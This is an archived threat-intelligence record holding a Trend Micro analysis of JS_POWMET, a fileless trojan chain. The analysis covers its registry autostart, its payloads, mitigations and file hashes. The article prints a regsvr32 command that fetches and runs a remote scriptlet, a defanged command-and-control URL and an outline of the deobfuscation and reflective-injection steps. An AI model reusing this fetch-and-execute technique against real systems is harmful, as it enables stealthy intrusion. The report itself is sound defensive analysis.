{
	"id": "5bda1e11-8757-4a5d-a07c-d3c5083a58fa",
	"created_at": "2026-04-06T00:21:49.216705Z",
	"updated_at": "2026-04-10T03:21:00.487258Z",
	"deleted_at": null,
	"sha1_hash": "ff5ad7f491a89aa1536b6ebc66c0f590e0aae03a",
	"title": "A Look at JS_POWMET, a Completely Fileless Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 68879,
	"plain_text": "A Look at JS_POWMET, a Completely Fileless Malware\r\nBy: Michael Villanueva, Byron Gelera Aug 02, 2017 Read time: 3 min (937 words)\r\nPublished: 2017-08-02 · Archived: 2026-04-05 16:22:34 UTC\r\nAs cybercriminals start to focus on pulling off attacks without leaving a trace, fileless malware, such as the recent SOREBRECT ransomware, will become a more common attack method. However, much of this malware is fileless only while entering a user’s system, as it eventually reveals itself when it executes its payload. Attacks that use completely fileless malware are a rare occurrence, so we thought it important to discuss a new trojan known as JS_POWMET (detected by Trend Micro as JS_POWMET.DE), which arrives via an autostart registry procedure. By using a completely fileless infection chain, the malware is more difficult to analyze in a sandbox, making it harder for anti-malware engineers to examine.\r\nOur Smart Protection Network (SPN) data shows that a previously detected backdoor thought to be related to JS_POWMET affected the APAC region the most, with almost 90% of infections coming from that region, so the fileless attack can be assumed to affect the same region.\r\nTechnical Details\r\nFigure 1. JS_POWMET infection diagram\r\nAlthough the exact method of arrival is still not certain, it is likely that the trojan is downloaded by users who visit malicious sites, or dropped as a file by other malware. What is clear about this malware is that the following registry entry has already been changed by the time it is downloaded onto the system:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run COM+ = “regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll”\r\nJS_POWMET is downloaded via the autostart registry entry shown above. The parameters passed to “regsvr32” are:\r\n1. /s = silent option for regsvr32\r\n2. /n = tells regsvr32 not to call DllRegisterServer\r\n3. /u = unregister server/object\r\n4. /i = used for passing an optional parameter (i.e. the URL) to DllInstall\r\n5. scrobj.dll = Microsoft’s Script Component Runtime\r\nIn this method, a URL is given to regsvr32 as a parameter, which makes regsvr32 fetch the file (an XML scriptlet containing malicious JavaScript) found at the URL. Because of this routine, regsvr32 can execute arbitrary scripts without saving the XML file to disk. In particular, whenever the affected machine starts up, it will automatically download the malicious file from its Command \u0026 Control (C\u0026C) server.\r\nOnce JS_POWMET is executed, it downloads another file known as TROJ_PSINJECT (detected by Trend Micro as TROJ_PSINJECT.A). This file is a PowerShell script that runs inside the PowerShell process. TROJ_PSINJECT connects to the following website:\r\nhxxps://bogerando[.]ru/favicon\r\nThis allows TROJ_PSINJECT to download a normal-looking file called favicon. The favicon file is then decrypted and injected into its own process using ReflectivePELoader, which is used for injecting EXE/DLL files.\r\nTo deobfuscate its code, the malware uses the following techniques. Initially, the malware contains Base64 strings that are decoded and then decrypted using an RC4 key (which is hard-coded into the malware). The resulting decrypted strings are GZIP-compressed data that the malware decompresses itself using its GZIP-decompression routine. This yields the code for the ReflectivePELoader function, which is then used to load the decrypted downloaded file.\r\nFavicon is also decrypted using the aforementioned RC4 key, resulting in a malicious DLL file known as BKDR_ANDROM (detected by Trend Micro as BKDR_ANDROM.ETIN). Again, this part of the process is also fileless; the file is not saved to the machine but rather injected into the powershell.exe process. All of these routines are executed by the malware using PowerShell commands.\r\nFigure 2. TROJ_PSINJECT code showing the deobfuscation process\r\nBKDR_ANDROM terminates powershell.exe if it is found running on the system. In addition, it gathers the following data:\r\nRoot Volume Serial Number\r\nOperating System Version\r\nLocal IP Address\r\nAdministrator privileges\r\nThe malware adds registry entries to the system to ensure that it always executes during startup. The autostart registry entry decodes a Base64-encoded PowerShell command, which is used to decrypt the encrypted binary data (also stored in the registry, added by the malware) that yields the malicious code of BKDR_ANDROM. After the decryption process, it executes the decrypted malicious code. While the final payload in this case consists of the common routines of BKDR_ANDROM, there is also a chance that future malware authors might use other malware as the payload.\r\nConclusion\r\nWhile JS_POWMET and the rest of the files it downloads are relatively light in terms of impact, this malware demonstrates the lengths cybercriminals will go to in order to avoid detection and analysis. It also shows that even relatively uncommon infection methods involving fileless malware continually evolve. Organizations and users should always look beyond the obvious malware files and be on the lookout for “stealthy” malware that manages to slip into the system virtually unnoticed. One of the more effective methods for mitigating the effects of fileless malware is to limit access to critical infrastructure via container-based systems that separate endpoints from the most important parts of the network. For this specific malware, IT professionals can also look into disabling PowerShell itself to help mitigate the effects of JS_POWMET and its various payloads.\r\nTrend Micro Solutions\r\nFileless malware is designed to make detection by security solutions more difficult; as such, organizations need to implement multilayered solutions that can help with detection. Trend Micro endpoint solutions such as the Trend Micro™ Security, OfficeScan, and Worry-Free Business Security suites include behavior monitoring to detect this type of malware; this helps organizations watch for malicious behavior and block the malware before that behavior is executed.\r\nThe following hashes were used for this article:\r\n7004b6c1829a745002feb7fbb0aad1a4d32c640a6c257dc8d0c39ce7b63b58cc (TROJ_PSINJECT.A)\r\ne27f417b96a33d8449f6cf00b8306160e2f1b845ca2c9666081166620651a3ae (JS_POWMET.DE)\r\nbff21cbf95da5f3149c67f2c0f2576a6de44fa9d0cb093259c9a5db919599940 (BKDR_ANDROM.ETIN)\r\nSource: http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/"
	],
	"report_names": [
		"look-js_powmet-completely-fileless-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434909,
	"ts_updated_at": 1775791260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ff5ad7f491a89aa1536b6ebc66c0f590e0aae03a.pdf",
		"text": "https://archive.orkl.eu/ff5ad7f491a89aa1536b6ebc66c0f590e0aae03a.txt",
		"img": "https://archive.orkl.eu/ff5ad7f491a89aa1536b6ebc66c0f590e0aae03a.jpg"
	}
}